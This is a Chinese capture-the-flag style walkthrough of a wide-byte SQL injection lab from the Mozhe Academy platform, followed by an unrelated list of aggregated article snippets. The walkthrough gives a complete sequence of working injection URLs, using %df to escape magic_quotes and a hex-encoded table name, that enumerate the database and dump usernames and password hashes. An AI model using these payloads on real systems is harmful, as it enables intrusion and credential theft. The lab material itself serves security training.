Beyond My
Beyond My

sql注入之宽字节注入(墨者学院)

sql注入之宽字节注入
1.原理:当php开启魔术函数–magic_quotes_gpc函数时,单引号(’)  双引号(")  反斜线() 等字符都会加上反斜线。
eg:我们在id=1后面加上’ 会被自动转义为 /’ 所以导致我们输入的东西无法闭合,就不会当做代码执行,就无法产生SQL注入了。
2.绕过原理:
(1)1,a,’ 均为一个字节
(2)汉字 均为三个字节
(3)希腊字母β—> 两个字节
我们可以用β来覆盖所产生的/,从而导致闭合语句,可以正常注入!(β的url编码为%df)。
3.实战:
我们在传递的参数后面加: %df’ ,可以看到产生了宽字节,引号成功逃逸,接着就可以常规注入!
sql注入之宽字节注入(墨者学院)_第1张图片
我们先来查询一下字段值:

http://219.153.49.228:49740/new_list.php?id=1 %df'  order by 5--+

sql注入之宽字节注入(墨者学院)_第2张图片
接着看一下回显:

http://219.153.49.228:49740/new_list.php?id=-1 %df'  union select 1,2,3,4,5--+

sql注入之宽字节注入(墨者学院)_第3张图片

然后我们可以查看库名以及用户;

http://219.153.49.228:49740/new_list.php?id=-1 %df'  union select 1,2,database(),4,5--+

sql注入之宽字节注入(墨者学院)_第4张图片
接着爆表名:

http://219.153.49.228:49740/new_list.php?id=-1 %df'  union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5--+

sql注入之宽字节注入(墨者学院)_第5张图片
爆字段需要注意,因为语句 where=’table‘ 查字段名字,这里用到单引号,这里也会被转义会报错。解决方案:将表名转16进制(然后前面加上0x,因为0x为16进制的标志)

http://219.153.49.228:49740/new_list.php?id=-1 %df'  union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572),4,5--+

sql注入之宽字节注入(墨者学院)_第6张图片
最后我们爆字段即可:

http://219.153.49.228:49740/new_list.php?id=-1 %df'  union select 1,2,(select group_concat(password) from stormgroup_member),4,(select group_concat(name) from stormgroup_member)--+

sql注入之宽字节注入(墨者学院)_第7张图片
4.MD5解密一下拿到flag!
sql注入之宽字节注入(墨者学院)_第8张图片

你可能感兴趣的:(实战集)

  • 大数据日志传输之Kafka实战教程 weixin_34279184 大数据java
    大数据日志传输之Kafka实战本套课程围绕Kafka架构详细讲解kafka的核心架构组件,broker,consumer,producer,以及日志的分段存储,稀疏索引,副本平衡,重分区,数据同步,Kafka的核心组控制器和消费者控制器等机制.全面讲解java最新版的api,指定分区消费,流控制,手动commit,异步Callback,同步的按照Partition进行批量commit等.实战集成S
  • JavaCV的摄像头实战之一:基础 程序员欣宸
    欢迎访问我的GitHub这里分类和汇总了欣宸的全部原创(含配套源码):https://github.com/zq2599/blog_demos关于《JavaCV的摄像头实战》系列《JavaCV的摄像头实战》顾名思义,是使用JavaCV框架对摄像头进行各种处理的实战集合,这是欣宸作为一名Java程序员,在计算机视觉(computervision)领域的一个原创系列,通过连续的编码实战,与您一同学习掌
  • Gitlab系列(5)—— Gitalb-runner CI/CD项目实战 01空间 环境搭建GitlabDockergitlabci/cd
    Gitalb-runnerCI/CD项目实战集成Maven构建镜像发布Docker镜像到远程仓库远程部署本文基于基于Gitlab-runner的CI/CD集成一文,采用的是BIND的方式,增加实际项目相关的内容,本文以SpringBoot项目为例,其他项目可借鉴思路。集成Maven这里使用的maven镜像是:maven:3.8.2-openjdk-8-slim众所周知maven默认会去,中央仓库下
  • 接口自动化测试-Postman+Newman+Git+Jenkins实战集成(详细) 网易测试开发猿 接口自动化软件测试自动化测试postmanjenkins软件测试自动化测试接口自动化测试接口自动化接口测试
    目录:导读前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结(尾部小惊喜)前言1、Postman创建Collection,在Collection中创建接口请求,如下图所示。编写接口对应的断言Test和Pre-requestScript,如下图所示。
  • ShardingSphere项目实战集群环境准备 硕风和炜 ShardingSphereShardingSpherespringbootmysqljavadockerlinux集群
    ShardingSphere算法刷题专栏|面试必备算法|面试高频算法越难的东西,越要努力坚持,因为它具有很高的价值,算法就是这样✨作者简介:硕风和炜,CSDN-Java领域优质创作者,保研|国家奖学金|高中学习JAVA|大学完善JAVA开发技术栈|面试刷题|面经八股文|经验分享|好用的网站工具分享恭喜你发现一枚宝藏博主,赶快收入囊中吧人生如棋,我愿为卒,行动虽慢,可谁曾见我后退一步?Shardin
  • RocketMQ实战-搭建高可用的分布式消息队列集群 肖凯瀚 中间件-MQ分布式中间件java-rocketmqrocketmq
    文章目录RocketMQ各部分角色RocketMQ多集群配置和部署实战集群查看方式Broker配置参数介绍RocketMQ各部分角色NameServer,Broker,Producer,Consumer类比邮政系统,Producer是发信人;Consumer是收信人;Broker是负责暂存、传输信件的邮局;NameServer是负责协调各邮局的管理机构。启动RocketMQ的顺序是先启动NameS
  • Kubernetes K8S架构师实战集训营-[高级班] 视频教程 qq_52288243 分布式大数据javakubernetes编程语言
    【内容】┣━━第1章:Ansible自动化部署K8S集群[3.2G]┃┣━━工具┃┣━━文档┃┣━━01-Ansible概述,基本使用.mp4[341.5M]┃┣━━02-7个常用模块基本使用.mp4[526.3M]┃┣━━03-Playbook基本使用-A.mp4[143.6M]┃┣━━03-Playbook基本使用-B.mp4[363.5M]┃┣━━04-Roles基本使用,熟悉K8S二进制部
  • ML6自学笔记 十九岁的花季少女 机器学习python机器学习人工智能
    集成算法实战集成算法工具包:http://ml-ensemble.com/集成算法的思想X数据通过不同的数据处理可以变成X1,X2,通过不同的处理算法f可以得到不同的结果pi,最后平均成最终的结果P。导包预处理数据importnumpyasnpimportpandasaspdimportmatplotlib.pyplotasplt%matplotlibinline###Importdata#随机种
  • 【Linux】Linux系统中安装Zookeeper集群的详细配置 小 源 Linux系列linuxjava-zookeeperzookeeper
    搭建Zookeeper集群实战前言:zookeeper在企业中往往都是以集群的方式出现,可以服务的可用性。刚好最近公司安装环境,顺便整理了一下安装过程,方便大家学习,企业真实案例。目录搭建Zookeeper集群实战集群规划1.1分布式安装部署1.2客户端命令行操作1.3ZK集群启动停止脚本下载地址官网:ApacheDownloadMirrors百度网盘:链接:https://pan.baidu.c
  • K8S实战集训第一课 Ansible自动化部署k8s、弹性伸缩、Helm包管理、k8s网络模型介绍 办公模板库 素材蛙 教程云原生自动化运维kubernetesk8sansible
    Ansible自动化部署K8S集群一、Ansible自动化部署K8S集群1.1Ansible介绍Ansible是一种IT自动化工具。它可以配置系统,部署软件以及协调更高级的IT任务,例如持续部署,滚动更新。Ansible适用于管理企业IT基础设施,从具有少数主机的小规模到数千个实例的企业环境。Ansible也是一种简单的自动化语言,可以完美地描述IT应用程序基础结构。具备以下三个特点:简单:减少学
  • 焦化系统电气实战集之煤气鼓风机 降低焦炉煤气鼓风机故障停机率 时间久了也就那样了
    降低焦炉煤气鼓风机故障停机率焦化焦炉煤气鼓风机干过焦化的人都知道它很重要。解决了焦炉煤气鼓风机的问题就解决了50﹪焦化人的生存问题。而解决了焦炉煤气鼓风机电气部分的问题就解决了焦炉煤气鼓风机的90﹪问题。以下我就焦炉煤气鼓风机电气部分的问题处理实践分享给同仁。一、问题的提出:1、低压电源的问题;几乎每个焦化企业都对焦炉煤气鼓风机低压电源都上有380V低压双电源自切功能柜。但由于自切换时间≥0.5S
  • JavaCV实战之调用摄像头基础详解
    目录关于《JavaCV的摄像头实战》系列本篇概览环境和版本信息源码下载基本套路分析基本框架编码部署媒体服务器关于《JavaCV的摄像头实战》系列《JavaCV的摄像头实战》顾名思义,是使用JavaCV框架对摄像头进行各种处理的实战集合,这是欣宸作为一名Java程序员,在计算机视觉(computervision)领域的一个原创系列,通过连续的编码实战,与您一同学习掌握视频、音频、图片等资源的各种操作
  • JavaCV的摄像头实战之一:基础 云计算
    欢迎访问我的GitHub这里分类和汇总了欣宸的全部原创(含配套源码):https://github.com/zq2599/blog_demos关于《JavaCV的摄像头实战》系列《JavaCV的摄像头实战》顾名思义,是使用JavaCV框架对摄像头进行各种处理的实战集合,这是欣宸作为一名Java程序员,在计算机视觉(computervision)领域的一个原创系列,通过连续的编码实战,与您一同学习掌
  • 链接 渡猫
    LeaningToRankLTR简介LTRforimformationretrievalLambdaMARTFromRankNettoLambdaRanktoLambdaMart时序分析时序分析实战1实战2推荐系统电影推荐实战集体智慧编程笔记C++集体智慧编程github集体智慧编程笔记
  • 微商一年来的心得 c5e31a457fa8
    想玩赚微商,而你选对产品了吗?2016-12-05前海艾艾贴梦想集中营微商已经逐渐走进我们的生活,想通过微商创业的你?有想过怎么做好微商吗?要怎样选择产品才更为合理呢?什么样的产品才能保证更好的经营呢?艾艾贴微商实战集中营总结了以下几个方面供广大微商创业者参考,希望可以帮到大家。1产品最好具有历史和行业内专家的背书,同时又是现在或者是未来生活的趋势产品。产品出处如果带有历史和行业内专家的背书那是一
  • 原理+代码|深入浅出Python随机森林预测实战 Y小光头
    先赞再看,养成习惯!文末资料,免费分享!前言组合算法也叫集成学习,在金融行业或非图像识别领域,效果有时甚至比深度学习还要好。能够理解基本原理并将代码用于实际的业务案例是本文的目标,本文将详细介绍如何利用Python实现集成学习中随机森林这个经典的方法来预测宽带客户的流失,主要将分为两个部分:详细原理介绍Python代码实战集成学习本文的主角是随机森林,所以我们将以随机森林所属的分支——装袋法入手,
  • 推荐系统 - 深度兴趣网络DIN(Deep Interest Network)浅析和实现 RecDay2018 推荐系统数据挖掘机器学习深度学习推荐系统
    本文收录在推荐系统专栏,专栏系统化的整理推荐系统相关的算法和框架,并记录了相关实践经验,所有代码都已整理至推荐算法实战集合(hub-recsys)。目录一.论文浅析1.1注意力机制-attention1.2激活函数-Dice1.3评价指标-GAUC1.4自适应正则-AdaptiveRegularization二.代码解读2.1数据处理2.2attention机制一.论文浅析常见的深度学习网络应用于
  • DevSecOps 工具一览 朱清云的技术博客 DevOps
    几年前,DevOps非常的火热,最近几年,基本上有能力的大公司的都在推行DevOps的最佳实践;但是目前在一些银行,金融,财务,电商等行业里面,DevSecOps也正在流行并大行其道。下面是DevSecOps的定义:DevSecOps是一种把安全的最佳实战集成到DevOps的流程里面。DevSecOps包括创立一种安全即代码(‘SecurityasCode’)的文化,从而在发布开发工程师和安全团队
  • Nuxt.js 实战集锦 洁本佳人 nuxt.jsvue.js服务端渲染
    读本文前,请先熟读nuxt官方文档,并且具备一定的vue.js相关开发经验中文文档英文文档vueSSR指南一、CSR和SSR对比在SPA之前的时代,我们传统的Web架构大都是SSR,如:Wordpress(PHP)、JSP技术、JavaWeb等这些程序都是传统典型的SSR架构,即:服务端取出数据和模板组合生成html输出给前端,前端发生请求时,重新向服务端请求html资源。SPA(CSR):SPA
  • 最新《Python项目实战集合》 weixin_44997116
    01-基础慕课网-Python3入门与进阶老男孩-python3全栈三期小甲鱼零基础入门学习Python视频教程全套96集01-Python入门到项目实战篇(Python3.5.2)Python基础班2016Python入门教程完整版(懂中文就能学会)视频02-进阶慕课网-Python操作三大主流库慕课网-Python使用技巧话题Python之云计算开发王者-视频03-webDjango框架视频P
  • CSS网页工程师就业实战集锦(WEB全栈前端开发)-黄菊华-专题视频课程 黄菊华老师 视频教程
    CSS网页工程师就业实战集锦(WEB全栈前端开发)—274人已学习课程介绍实战css的实际就业工作所需要的:导航菜单,图片,价格表,进度条,提示框,时钟,三角形,按钮,圆角,渐变,投影,阴影,响应式,表格,表格样式,表单,绘图,字体,字体图标,下拉菜单,加载动画,旋转动画,登陆界面,文字,图标等方面的应用课程收益学完即可参与就业讲师介绍黄菊华更多讲师课程04年开始走上计算机行业,6年net和php
  • PMP 真的没用吗? gooogleman 研发管理
    最近在备考2018.3.24的pmp认证考试,有不少收获,此前我曾在群里邀请大家一起备考,一些人跳出来就说考这些有啥用?干技术的把技术干好就行了,技术人员最烦这些没点技术的项目经理了。几年前我曾经也是有类似的想法的,但是当我做了三个大型项目的项目经理后,我早已深刻领悟技术人员沉浸在自己技术狭小的世界里面才是真的坐井观天了!2014~2015年间,我在以前公司不断培训并实战集中管理开发,给我的思想很
  • Kubernetes/K8s架构师实战集训营【中、高级班】-2020 机器侠
    下载地址:【中级班】链接:https://pan.baidu.com/s/1FWAz2V7BPsObixlZyW93sw提取码:mvu0【高级班】链接:https://pan.baidu.com/s/1eYNq74qRnc1au3gnHU62jw提取码:qqbh目录:【01】:开班仪式开班仪式:同学认识,内容综述及学习建议(3月3日20:10-22:00)【02】:Kubernetes入门(上)-
  • 视频教程-Python数据分析与机器学习实战集锦-机器学习 weixin_32786803
    Python数据分析与机器学习实战集锦计算机博士,专注于机器学习与计算机视觉领域,深度学习领域一线实战讲师。在图像识别领域有着丰富经验,实现过包括人脸识别,物体识别,关键点检测等多种应用的新算法。参与多个国家级计算机视觉项目,多年数据领域培训经验,丰富的教学讲解经验,出品多套机器学习与深度学习系列课程,课程生动形象,风格通俗易懂。唐宇迪¥298.00立即订阅扫码下载「CSDN程序员学院APP」,1
  • 推荐系统 - Google多目标学习MMOE(附tf2.0实现) RecDay2018 推荐系统python算法机器学习深度学习
    本文收录在推荐系统专栏,专栏系统化的整理推荐系统相关的算法和框架,并记录了相关实践经验,所有代码都已整理至推荐算法实战集合(hub-recsys)。1.背景何谓多任务,即在一个模型中考虑多个目标。在推荐系统中,往往需要同时优化多个业务目标,承担起更多的业务收益。如电商场景:希望能够同时优化点击率和转换率,使得平台具备更加的目标;信息流场景,希望提高用户点击率的基础上提高用户关注,点赞,评论等行为,
  • centos7安装部署docker 机器侠
    Kubernetes/K8s架构师实战集训营【中级班】:https://pan.baidu.com/s/1FWAz2V7BPsObixlZyW93sw提取码:mvu0Kubernetes/K8s架构师实战集训营【高级班】https://pan.baidu.com/s/1eYNq74qRnc1au3gnHU62jw提取码:qqbh系统版本:CentOSLinuxrelease7.7.1908(Cor
  • WAF嵌入LNMP集群架构 SuperGu
    前言:之前想着每天都更新一篇文章,但是连续几天之后,发现有好多博客大佬,所以觉得还是不要献丑好一点,然后就学习一下关于安全防护的知识,毕竟安全意识强弱代表在互联网防护能力,类似ddos,xss,csrf等也是经常出现,比如一些基本的×××方式:SQL注入,web参数,cc。所以我就记录了下面全程的将WAF嵌入LNMP架构,应用于实战集群架构。附带lua语言写的防护模块。实战:服务器架构图如下:一、
  • 报名 | 2018年重点高校自主招生面试实战集训营 自主招生指南
    名师专家面试实战课程+精选笔试网课(含数学、语文、英语、物理、化学、历史六科目自由搭配)+精选电子题库(大数据电子题库自招刷题利器)一、机构介绍清大紫育(原紫光教育基础教育部)专注于中学尖优生培养辅导工作近十年,是国内开办高校自主选拔考试培训的专业机构;2016年11月2日,清大紫育正式在新三板成功上市,成为高校自主招生、三位一体行业领域首家上市机构,成为高校自主招生、三位一体教育培训行业领导者。
  • 报名 | 2018年重点高校自主招生面试实战集训营(天津) 自主招生指南
    一、机构介绍清大紫育(原紫光教育基础教育部)专注于中学尖优生培养辅导工作近十年,是国内开办高校自主选拔考试培训的专业机构;2016年11月2日,清大紫育正式在新三板成功上市,成为高校自主招生、三位一体行业领域首家上市机构,成为高校自主招生、三位一体教育培训行业领导者。清大紫育面向全国优秀中学开展以五大学科奥赛辅导为主体的尖优生学科特长培养;面向全国优秀中学开展重点高校选拔、冬夏令营、先修课为主的尖
  • 没人在灯火阑珊处等你——《经济的律动》 你先走
    经济的律动——读懂中国宏观经济与市场《经济的律动》是北京大学徐远教授的新书,全书上下两部分,上半部分主要是作者的知识历程——方法论,下半部分是他近年的一些时评文章——实战集,我更喜欢上半部分。徐远为书所作自序名为“那人不在灯火阑珊处——开放社会的经济分析”,取义国人治学常引用王国维的“蓦然回首,那人却在灯火阑珊处”,他质疑这种蓦然回首后的大彻大悟可能是一种幻觉。因为人类社会的演进,是一个开放的系统
  • iOS http封装 374016526 ios服务器交互http网络请求
    程序开发避免不了与服务器的交互,这里打包了一个自己写的http交互库。希望可以帮到大家。   内置一个basehttp,当我们创建自己的service可以继承实现。   KuroAppBaseHttp *baseHttp = [[KuroAppBaseHttp alloc] init]; [baseHttp setDelegate:self]; [baseHttp
  • lolcat :一个在 Linux 终端中输出彩虹特效的命令行工具 brotherlamp linuxlinux教程linux视频linux自学linux资料
      那些相信 Linux 命令行是单调无聊且没有任何乐趣的人们,你们错了,这里有一些有关 Linux 的文章,它们展示着 Linux 是如何的有趣和“淘气” 。 在本文中,我将讨论一个名为“lolcat”的小工具 – 它可以在终端中生成彩虹般的颜色。 何为 lolcat ? Lolcat 是一个针对 Linux,BSD 和 OSX 平台的工具,它类似于 cat 命令,并为 cat
  • MongoDB索引管理(1)——[九] eksliang mongodbMongoDB管理索引
    转载请出自出处:http://eksliang.iteye.com/blog/2178427 一、概述       数据库的索引与书籍的索引类似,有了索引就不需要翻转整本书。数据库的索引跟这个原理一样,首先在索引中找,在索引中找到条目以后,就可以直接跳转到目标文档的位置,从而使查询速度提高几个数据量级。       不使用索引的查询称
  • Informatica参数及变量 18289753290 Informatica参数变量
    下面是本人通俗的理解,如有不对之处,希望指正 info参数的设置:在info中用到的参数都在server的专门的配置文件中(最好以parma)结尾 下面的GLOBAl就是全局的,$开头的是系统级变量,$$开头的变量是自定义变量。如果是在session中或者mapping中用到的变量就是局部变量,那就把global换成对应的session或者mapping名字。 [GLOBAL] $Par
  • python 解析unicode字符串为utf8编码字符串 酷的飞上天空 unicode
    php返回的json字符串如果包含中文,则会被转换成\uxx格式的unicode编码字符串返回。 在浏览器中能正常识别这种编码,但是后台程序却不能识别,直接输出显示的是\uxx的字符,并未进行转码。   转换方式如下   >>> import json >>> q = '{"text":"\u4
  • Hibernate的总结 永夜-极光 Hibernate
    1.hibernate的作用,简化对数据库的编码,使开发人员不必再与复杂的sql语句打交道   做项目大部分都需要用JAVA来链接数据库,比如你要做一个会员注册的 页面,那么 获取到用户填写的 基本信后,你要把这些基本信息存入数据库对应的表中,不用hibernate还有mybatis之类的框架,都不用的话就得用JDBC,也就是JAVA自己的,用这个东西你要写很多的代码,比如保存注册信
  • SyntaxError: Non-UTF-8 code starting with '\xc4' 随便小屋 python
    刚开始看一下Python语言,传说听强大的,但我感觉还是没Java强吧! 写Hello World的时候就遇到一个问题,在Eclipse中写的,代码如下 ''' Created on 2014年10月27日 @author: Logic ''' print("Hello World!");  运行结果 SyntaxError: Non-UTF-8
  • 学会敬酒礼仪 不做酒席菜鸟 aijuans 菜鸟
    俗话说,酒是越喝越厚,但在酒桌上也有很多学问讲究,以下总结了一些酒桌上的你不得不注意的小细节。 细节一:领导相互喝完才轮到自己敬酒。敬酒一定要站起来,双手举杯。 细节二:可以多人敬一人,决不可一人敬多人,除非你是领导。 细节三:自己敬别人,如果不碰杯,自己喝多少可视乎情况而定,比如对方酒量,对方喝酒态度,切不可比对方喝得少,要知道是自己敬人。 细节四:自己敬别人,如果碰杯,一
  • 《创新者的基因》读书笔记 aoyouzi 读书笔记《创新者的基因》
    创新者的基因   创新者的“基因”,即最具创意的企业家具备的五种“发现技能”:联想,观察,实验,发问,建立人脉。   第一部分破坏性创新,从你开始 第一章破坏性创新者的基因 如何获得启示: 发现以下的因素起到了催化剂的作用:(1) -个挑战现状的问题;(2)对某项技术、某个公司或顾客的观察;(3) -次尝试新鲜事物的经验或实验;(4)与某人进行了一次交谈,为他点醒
  • 表单验证技术 百合不是茶 JavaScriptDOM对象String对象事件
    js最主要的功能就是验证表单,下面是我对表单验证的一些理解,贴出来与大家交流交流  ,数显我们要知道表单验证需要的技术点, String对象,事件,函数   一:String对象;通常是对字符串的操作;   1,String的属性;   字符串.length;表示该字符串的长度; var str= "java"
  • web.xml配置详解之context-param bijian1013 javaservletweb.xmlcontext-param
    一.格式定义: <context-param> <param-name>contextConfigLocation</param-name> <param-value>contextConfigLocationValue></param-value> </context-param> 作用:该元
  • Web系统常见编码漏洞(开发工程师知晓) Bill_chen sqlPHPWebfckeditor脚本
    1.头号大敌:SQL Injection 原因:程序中对用户输入检查不严格,用户可以提交一段数据库查询代码,根据程序返回的结果, 获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 本质: 对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行。 示例: String query = "SELECT id FROM users
  • 【MongoDB学习笔记六】MongoDB修改器 bit1129 mongodb
    本文首先介绍下MongoDB的基本的增删改查操作,然后,详细介绍MongoDB提供的修改器,以完成各种各样的文档更新操作  MongoDB的主要操作 show dbs 显示当前用户能看到哪些数据库 use foobar 将数据库切换到foobar show collections 显示当前数据库有哪些集合 db.people.update,update不带参数,可
  • 提高职业素养,做好人生规划 白糖_ 人生
      培训讲师是成都著名的企业培训讲师,他在讲课中提出的一些观点很新颖,在此我收录了一些分享一下。注:讲师的观点不代表本人的观点,这些东西大家自己揣摩。   1、什么是职业规划:职业规划并不完全代表你到什么阶段要当什么官要拿多少钱,这些都只是梦想。职业规划是清楚的认识自己现在缺什么,这个阶段该学习什么,下个阶段缺什么,又应该怎么去规划学习,这样才算是规划。  
  • 国外的网站你都到哪边看? bozch 技术网站国外
    学习软件开发技术,如果没有什么英文基础,最好还是看国内的一些技术网站,例如:开源OSchina,csdn,iteye,51cto等等。 个人感觉如果英语基础能力不错的话,可以浏览国外的网站来进行软件技术基础的学习,例如java开发中常用的到的网站有apache.org 里面有apache的很多Projects,springframework.org是spring相关的项目网站,还有几个感觉不错的
  • 编程之美-光影切割问题 bylijinnan 编程之美
    package a; public class DisorderCount { /**《编程之美》“光影切割问题” * 主要是两个问题: * 1.数学公式(设定没有三条以上的直线交于同一点): * 两条直线最多一个交点,将平面分成了4个区域; * 三条直线最多三个交点,将平面分成了7个区域; * 可以推出:N条直线 M个交点,区域数为N+M+1。
  • 关于Web跨站执行脚本概念 chenbowen00 Web安全跨站执行脚本
    跨站脚本攻击(XSS)是web应用程序中最危险和最常见的安全漏洞之一。安全研究人员发现这个漏洞在最受欢迎的网站,包括谷歌、Facebook、亚马逊、PayPal,和许多其他网站。如果你看看bug赏金计划,大多数报告的问题属于 XSS。为了防止跨站脚本攻击,浏览器也有自己的过滤器,但安全研究人员总是想方设法绕过这些过滤器。这个漏洞是通常用于执行cookie窃取、恶意软件传播,会话劫持,恶意重定向。在
  • [开源项目与投资]投资开源项目之前需要统计该项目已有的用户数 comsci 开源项目
            现在国内和国外,特别是美国那边,突然出现很多开源项目,但是这些项目的用户有多少,有多少忠诚的粉丝,对于投资者来讲,完全是一个未知数,那么要投资开源项目,我们投资者必须准确无误的知道该项目的全部情况,包括项目发起人的情况,项目的维持时间..项目的技术水平,项目的参与者的势力,项目投入产出的效益.....
  • oracle alert log file(告警日志文件) daizj oracle告警日志文件alert log file
    The alert log is a chronological log of messages and errors, and includes the following items: All internal errors (ORA-00600), block corruption errors (ORA-01578), and deadlock errors (ORA-00060)
  • 关于 CAS SSO 文章声明 denger SSO
    由于几年前写了几篇 CAS 系列的文章,之后陆续有人参照文章去实现,可都遇到了各种问题,同时经常或多或少的收到不少人的求助。现在这时特此说明几点: 1.  那些文章发表于好几年前了,CAS 已经更新几个很多版本了,由于近年已经没有做该领域方面的事情,所有文章也没有持续更新。 2. 文章只是提供思路,尽管 CAS 版本已经发生变化,但原理和流程仍然一致。最重要的是明白原理,然后
  • 初二上学期难记单词 dcj3sjt126com englishword
    lesson 课 traffic 交通 matter 要紧;事物 happy 快乐的,幸福的 second 第二的 idea 主意;想法;意见 mean 意味着 important 重要的,重大的 never 从来,决不 afraid 害怕 的 fifth 第五的 hometown 故乡,家乡 discuss 讨论;议论 east 东方的 agree 同意;赞成 bo
  • uicollectionview 纯代码布局, 添加头部视图 dcj3sjt126com Collection
    #import <UIKit/UIKit.h> @interface myHeadView : UICollectionReusableView { UILabel *TitleLable; } -(void)setTextTitle; @end #import "myHeadView.h" @implementation m
  • N 位随机数字串的 JAVA 生成实现 FX夜归人 javaMath随机数Random
    /** * 功能描述 随机数工具类<br /> * @author FengXueYeGuiRen * 创建时间 2014-7-25<br /> */ public class RandomUtil { // 随机数生成器 private static java.util.Random random = new java.util.R
  • Ehcache(09)——缓存Web页面 234390216 ehcache页面缓存
    页面缓存 目录 1       SimplePageCachingFilter 1.1      calculateKey 1.2      可配置的初始化参数 1.2.1     cach
  • spring中少用的注解@primary解析 jackyrong primary
    这次看下spring中少见的注解@primary注解,例子 @Component public class MetalSinger implements Singer{ @Override public String sing(String lyrics) { return "I am singing with DIO voice
  • Java几款性能分析工具的对比 lbwahoo java
    Java几款性能分析工具的对比 摘自:http://my.oschina.net/liux/blog/51800   在给客户的应用程序维护的过程中,我注意到在高负载下的一些性能问题。理论上,增加对应用程序的负载会使性能等比率的下降。然而,我认为性能下降的比率远远高于负载的增加。我也发现,性能可以通过改变应用程序的逻辑来提升,甚至达到极限。为了更详细的了解这一点,我们需要做一些性能
  • JVM参数配置大全 nickys jvm应用服务器
    JVM参数配置大全 /usr/local/jdk/bin/java -Dresin.home=/usr/local/resin -server -Xms1800M -Xmx1800M -Xmn300M -Xss512K -XX:PermSize=300M -XX:MaxPermSize=300M -XX:SurvivorRatio=8 -XX:MaxTenuringThreshold=5 -
  • 搭建 CentOS 6 服务器(14) - squid、Varnish rensanning varnish
    (一)squid 安装 # yum install httpd-tools -y # htpasswd -c -b /etc/squid/passwords squiduser 123456 # yum install squid -y 设置 # cp /etc/squid/squid.conf /etc/squid/squid.conf.bak # vi /etc/
  • Spring缓存注解@Cache使用 tom_seed spring
    参考资料 http://www.ibm.com/developerworks/cn/opensource/os-cn-spring-cache/ http://swiftlet.net/archives/774   缓存注解有以下三个: @Cacheable      @CacheEvict     @CachePut
  • dom4j解析XML时出现"java.lang.noclassdeffounderror: org/jaxen/jaxenexception"错误 xp9802
    java.lang.NoClassDefFoundError: org/jaxen/JaxenExc 关键字: java.lang.noclassdeffounderror: org/jaxen/jaxenexception 使用dom4j解析XML时,要快速获取某个节点的数据,使用XPath是个不错的方法,dom4j的快速手册里也建议使用这种方式 执行时却抛出以下异常: Exceptio
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他